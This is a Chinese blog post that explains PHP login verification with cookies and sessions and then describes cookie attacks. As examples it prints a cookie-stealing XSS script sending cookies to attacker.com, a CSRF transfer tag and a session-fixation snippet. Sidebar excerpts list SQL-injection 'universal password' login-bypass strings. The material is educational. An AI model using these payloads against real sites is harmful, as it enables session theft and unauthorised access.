PHP登录验证流程(cookie验证码万能密码)

已于 2024-07-17 14:54:19 修改
阅读量865 收藏 7
点赞数 13
文章标签: php 开发语言
于 2024-06-06 14:15:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74120514/article/details/139483704
版权

目录

PHP登录验证流程

1. 发送登录请求:账号,密码

2. 接收账号密码

3. 判断账号密码准确性

4. 使用cookie或session进行身份验证

Session

cookie的安全漏洞

会话劫持(Session Hijacking)

跨站请求伪造(Cross-Site Request Forgery,CSRF)

Cookie固定(Session Fixation)

PHP登录验证流程

1. 发送登录请求:账号,密码


用户通过登录页面的表单提交其账号和密码。

2. 接收账号密码


服务器接收到用户提交的表单数据,包括账号和密码。

3. 判断账号密码准确性


服务器对提交的账号和密码进行验证:

先从数据库中查询与提交的账号对应的记录。
如果记录存在,则对提交的密码和数据库中的密码进行比较(通常会对密码进行哈希处理以增强安全性)。
正确 -> 成功登录,跳转页面
如果账号和密码匹配,表示验证成功。
服务器创建一个会话(session)并将用户的信息存储在服务器端。
服务器将会话ID通过cookie发送到客户端浏览器。
用户被重定向到登录后的主页面。
失败 -> 跳转到重新登录页面
如果账号或密码不匹配,表示验证失败。
用户被重定向回登录页面,并可能显示一条错误消息。


4. 使用cookie或session进行身份验证


为了在用户登录后不需要重复验证操作,可以使用cookie或session来进行身份验证。


Cookie用于在客户端浏览器中存储身份验证信息。
服务器在用户登录成功后,将会话ID存储在cookie中并发送给客户端浏览器。
客户端浏览器会在后续请求中自动发送这个cookie,以便服务器识别用户身份。


Session

Session用于在服务器端存储用户的身份验证信息。
在用户登录成功后,服务器创建一个会话并存储用户信息,如用户ID、用户名等。
服务器将会话ID通过cookie发送给客户端浏览器。
在后续请求中,客户端浏览器会发送这个cookie,服务器通过会话ID找到对应的用户信息,从而实现身份验证。

cookie的安全漏洞

会话劫持(Session Hijacking)


攻击者通过窃取用户的会话ID来冒充合法用户,通常的方法包括:

网络嗅探:在未加密的网络中监听并捕获用户的会话ID。使用HTTPS可以有效防止这种攻击。
恶意脚本:利用XSS漏洞注入恶意脚本,窃取用户的Cookie。

示例:XSS攻击窃取Cookie:

<script>
document.write('<img src="http://attacker.com/steal_cookie.php?cookie=' + document.cookie + '">');
</script>

跨站请求伪造(Cross-Site Request Forgery,CSRF)


攻击者诱使用户在已登录的情况下执行未经授权的操作。通常,攻击者会构造一个恶意链接或表单,当用户点击或提交时,用户的浏览器会携带合法的Cookie发起请求。

示例:CSRF攻击:

<img src="http://victim.com/transfer?amount=1000&to=attacker_account">

如果用户已登录并具有有效的会话,这个请求将使用用户的会话信息,完成攻击者意图的操作

Cookie固定(Session Fixation)


攻击者通过在用户登录前设置一个已知的会话ID,然后诱使用户使用这个会话ID进行登录。登录后,攻击者可以使用相同的会话ID来冒充用户

示例:攻击者首先访问应用并获取一个会话ID,然后将这个会话ID通过钓鱼链接或其他方式传递给用户:

<?php
session_start();
session_id('known_session_id');
?>

窃取Cookie:攻击者可以通过各种手段(如XSS攻击、会话劫持等)窃取用户的Cookie信息,包括用户的身份验证凭据。

篡改Cookie:攻击者可以修改Cookie的值,包括用户的身份标识、权限等。通过篡改Cookie,攻击者可以冒充其他用户的身份,执行未经授权的操作。

伪造Cookie:攻击者可以伪造一个新的Cookie,包含自己构造的内容。这种情况下,攻击者可以自由地设置Cookie的名称、值和其他属性,以达到欺骗、冒充或执行恶意操作的目的。

初黑子zzz
关注
  • 13
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
登陆页面 checklogin.php
u012416335的专栏
10-12 2453
//得到客户端传过来的参数 $us=$_GET["uname"]; $ps=$_GET["upass"]; //注册新用户到数据库 // 1.连接数据库 $conn=mysql_connect("127.0.0.1","root",""); //2.打开数据库 mysql_select_db("newdb"); //3.创建查询 $
PHP登录注册页面展示及(源代码)
cx12xc的博客
12-31 3680
登录、注册、验证码、PHP、JavaScript、bootstrap;前端源代码。
php之万能密码登陆
奕家
06-24 5291
''' 问题?后台登陆必须的账户和密码正确吗? 答:不一定是,看程序员写的代码如何,有没有做安全防范,程序都是人写的,人不是万能的,所以bug总会有的#嘛! 此时,万能登陆来了 ''' 1.用户正确密码正确: http://192.168.65.133/sqlserver/login.aspx 密码正确的数据库语句 select * from Admin where name='yuan' and passWord='123' 登录成功! 2.用户正确密码...
thinkphp6 验证码(配置,验证一直不通过,验证码不显示)
热门推荐
zhangxy
09-19 1万+
最近接触到thinkphp6的RC3版本,验证码都搞了我好长一段时间。 1、关于这个版本验证码的配置,官方文档中详细说明了,如果使用扩展内置的方法进行验证码显示,直接在应用的config目录下面的captcha.php文件(没有则首先创建)中进行设置即可,以下设置方式仅限于独立调用Captcha类的时候使用。所以我在config下自己创建了一个配置文件,需要的配置可参照文档自行配置: 配置...
php验证码手册,验证码 - ThinkPHP 5.1 完全开发手册
weixin_26759093的博客
03-29 338
首先使用Composer安装think-captcha扩展包:composer require topthink/think-captcha验证码的简单用法扩展包内定义了一些常见用法方便使用,可以满足大部分常用场景,以下示例说明。在模版内添加验证码的显示代码{:captcha_img()}或者上面两种的最终效果是一样的,根据需要调用即可。然后使用框架的内置验证功能(具体可以参考验证章节),添加ca...
php cookie 登录验证示例代码
10-30
PHP Cookie 登录验证示例代码解析 PHP Cookie 登录验证是指通过在...我们可以看到如何使用 PHP 来设置 Cookie验证用户信息和实现登录验证流程。但是,我们也需要注意到安全性问题,并采取相应的措施来防止攻击。
PHP 实现超简单的SESSION与COOKIE登录验证功能示例
10-15
在本文中,我们将深入探讨如何使用PHP实现基于SESSION和COOKIE的简单登录验证功能。首先,我们需要理解这两个概念的基础知识。 **SESSION**: - SESSION 是一种服务器端存储机制,用于存储用户会话数据。当用户访问...
使用cookie绕过验证登录的实现代码
08-29
在网络安全和Web开发中,利用Cookie来绕过验证登录是一种常见的安全漏洞,它允许攻击者在没有正确验证的情况下获得授权。以下将详细解释这个过程,以及如何通过Python的`requests`库来模拟这一行为。 首先,理解...
iOS中关于Cookie验证登录状态
08-30
总之,iOS中通过Cookie验证登录状态涉及获取、保存、恢复和清理Cookie流程。理解这些步骤对于开发能正确处理用户登录状态的应用至关重要。确保与服务器端的配合,以及正确处理Cookie的有效性,可以为用户提供流畅...
如何对一个php验证码授权测试,thinkphp5.1验证码及验证验证功能的实现详解
weixin_33269743的博客
03-16 148
注:由于thinkphp5.1没有自带验证码,所以需要通过composer安装think-captcha 扩展包才能实现验证码一、安装composerhttps://www.ddpool.cn/article/178346.htm二、通过composer安装think-captcha 扩展包打开命令窗口,进入vendor/topthink输入指令即可,也可以安装shift键再右击鼠标打开命令窗口可...
php 验证码 扩展,使用 Captcha 扩展包 为 Laravel 5 应用生成验证
weixin_29611573的博客
03-29 391
1、安装我们通过 Composer 安装Captcha 扩展包 : composer require mews/captcha注:Windows中使用该扩展包还需要安装 GD2 扩展(在 php.ini 中取消 php_gd2.dll 前面的注释)。2、配置使用Captcha服务提供者之前还需要在 config/app.php 中注册服务提供者: 'providers' => [...
ThinkPHP5 验证
德莱文森特的博客
12-14 209
后台代码 public function getCapImg(){ $config = [ // 验证码字体大小(px) 'fontSize' => 20, // 是否画混淆曲线 'useCurve' => false,
PHP万能密码登陆
weixin_34262482的博客
09-26 1066
说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是     百分之百。     可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了     PHP注入。     其实说这话的人没有好好想过,更没有尝试过用万能密码PHP的后台。     其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。     如果你用这样的万...
2020php万能密码,万能密码
weixin_35539198的博客
03-18 3558
看见登录框也不一定都要用万能密码 先尝试抓包,是否能直接发送代码执行asp aspx万能密码"or "a"="a')or('a'='aor 1=1--'or 1=1--a'or' 1=1--"or 1=1--'or'a'='a"or"="a'='a'or''=''or'='or'1 or '1'='1'=11 or '1'='1' or 1=1'OR 1=1%00"or 1=1%00'xor新型万...
PHP万能密码
Just Code
12-03 2591
刚接触PHP,对PHP安全方面的资料作了些收集和查阅,PHP注入首当其冲,一篇神秘小强的PHP万能密码写得不错,摘录:   说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是百分之百。 可 是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了PHP注入。其实说这话的人没有好好想过,更没有尝试过用万能密码PHP的后台。其实GPC魔...
PHP商城案例
王世凡的技术博客
07-26 308
http://www.e9933.com/
[Meachines] [Easy] Beep Elastix-CMS-LFI
最新发布
07-27 250
#Elastix-CMS-LFI
MICA:面向复杂嵌入式系统的混合关键性部署框架
openEuler_的博客
07-23 1072
这种方式存在的问题是:硬件上需要两套系统、集成度不高,通信受限于片外物理机制的限制(如速度、时延等),软件上 Linux 和实时操作系统两者之间是割裂的,在灵活性上、可维护性上存在改进空间。在上述架构中,virtio-rpmsg 相当于网络协议中的 MAC 层,提供高效的底层通信机制,rpmsg 相当于网络协议中的传输层,提供了基于端点(endpoint)与通道(channel)抽象的通信机制,remoteproc 提供不同南向底座的生命周期管理功能,包括初始化、启动、暂停、结束等。MICA 的守护进程。
PHP登录注册与邮箱验证全案:功能与代码详解
6. **登录界面 (login.php)** 和登录数据处理文件 **login_go.php**: 用户输入登录信息,登录后会检查激活状态、用户名存在性和密码匹配性,通过会话或cookie保存登录状态。如果勾选保存登录,还会发送cookie到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值